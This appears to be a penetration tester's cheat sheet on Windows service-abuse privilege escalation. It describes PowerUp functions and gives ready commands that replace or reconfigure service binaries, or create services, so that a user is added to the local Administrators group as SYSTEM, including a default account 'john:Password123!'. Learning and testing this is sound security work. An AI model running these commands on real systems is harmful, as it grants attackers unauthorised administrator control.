Takes a pre-compiled C# service binary and patches in the appropriate commands needed for service abuse. If a -UserName/-Password or -Credential is specified, the command patched in creates a local user and adds them to the specified -LocalGroup, otherwise the specified -Command is patched in. The binary is then written out to the specified -ServicePath. Either -Name must be specified for the service, or a proper object from Get-Service must be passed on the pipeline in order to patch in the appropriate service name the binary will be running under.
# EnumerationInvoke-AllChecksGet-ServiceUnquoted# AbuseWrite-ServiceBinary -Name 'service' -Path <HijackPatch> (will add john:Password123!)Write-ServiceBinary -Name 'service' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"# Restart Service (cmd)sc stop servicesc start service
Replaces the service binary for the specified service with one that executes a specified command as SYSTEM.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the current user can modify the associated service binary listed in the binPath. Backs up the original service binary to "OriginalService.exe.bak" in service binary location, and then uses Write-ServiceBinary to create a C# service binary that either adds a local administrator user or executes a custom command. The new service binary is replaced in the original service binary path, and a custom object is returned that captures the original and new service binary configuration.
# EnumerationInvoke-AllChecksGet-ModifiableServiceFile# AbuseInstall-ServiceBinary -Name 'service' (will add john:password123!)Install-ServiceBinary -Name 'service' -Command "net localgroup Administrators user /add"# ManualWrite-ServiceBinary -Name 'service' -Command "command" -Path "C:\service\write.exe"# Restart Service (cmd)sc stop servicesc start service# CleanupRestore-ServiceBinary -Name service -BackupPath 'C:\temp\backup.exe'
Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current user has configuration modification rights on and executes a series of automated actions to execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the original service binary path and configuration state are preserved. Then the service is stopped and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a series of commands, the service is started, stopped, and the next command is configured. After completion, the original service configuration is restored and a custom object is returned that captures the service abused and commands run.
# EnumerationInvoke-AllChecksGet-ModifiableService# AbuseInvoke-ServiceAbuse -Name 'service' (will create a local admin john:Password123!)Invoke-ServiceAbuse -Name 'service' -Command "net localgroup Administrators user /add"# Manualsc config "servicename" binPath= "cmd.exe /c net localgroup administrators user/add"sc stop "servicename"sc start "servicename"
# show permissions for service creationcmd /c sc sdshow scmanagerThis will show SDDL for scmanager. Is possible for low priv user to be included.https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/# Launch service as system from usersc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators USER /add" start= auto# Restart Computer and will be admin!